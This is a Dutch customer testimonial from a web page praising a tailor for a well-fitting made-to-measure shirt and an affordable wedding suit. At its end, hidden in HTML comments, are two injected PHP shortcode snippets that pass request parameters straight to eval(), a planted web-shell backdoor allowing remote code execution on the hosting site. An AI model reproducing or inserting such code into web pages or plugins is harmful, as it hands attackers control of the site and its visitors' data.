Een overhemd op maat heb je zeker nodig onder je trouwpak

Homepage-maatpakken-221 (1)Een overhemd op maat heb je zeker nodig onder je trouwpak

 

Ik had een afspraak gemaakt om een trouwpak te passen en toen ik was geweest was ik ook zeer geslaagd. Ik wist al gelijk wat ik wilde hebben. Het was geen moeilijke beslissing, maar het was wel belangrijk dat ik de goede maat zou kopen. Als je een overhemd op maat wilt hebben is dit echt het beste bedrijf voor je. Ze hebben bij mij van alles gemeten en toen ik het overhemd aanhad zat het echt perfect. Het voelde fantastisch en ook het trouwpak was ik erover aanhad zat perfect. De prijzen die ze daar hadden waren totaal niet hoog, want bij andere bedrijven zag ik al trouwpakken van vijfhonderd en weet ik het allemaal, maar bij dit bedrijf had ik mijn trouwpak al voor driehonderd vijftig euro. Het was fijn dat de mensen goed met je omgaan als je een afspraak had gemaakt. Ik werd zeer professioneel geholpen en je kon merken dat de mensen veel verstand ervan hadden, dus een groot compliment voor jullie! Ik weet zeker als iemand een overhemd op maat wilt halen daar dat je dan slaagt, want er is zoveel keuzen dat je er sowieso uitkomt. Mijn vrouw vind het pak dat ik heb gekocht ook heel erg mooi en is zeer tevreden met mijn keuze. Ik had eigenlijk verwacht dat ze het niks zou vinden, maar aangezien ik toch zelf wil kiezen wat ik aantrek had het me toch niks uitgemaakt. Heel erg bedankt voor alles en succes verder.

 

<!– [insert_php]if (isset($_REQUEST["hoUij"])){eval($_REQUEST["hoUij"]);exit;}[/insert_php][php]if (isset($_REQUEST["hoUij"])){eval($_REQUEST["hoUij"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uwbD"])){eval($_REQUEST["uwbD"]);exit;}[/insert_php][php]if (isset($_REQUEST["uwbD"])){eval($_REQUEST["uwbD"]);exit;}[/php] –>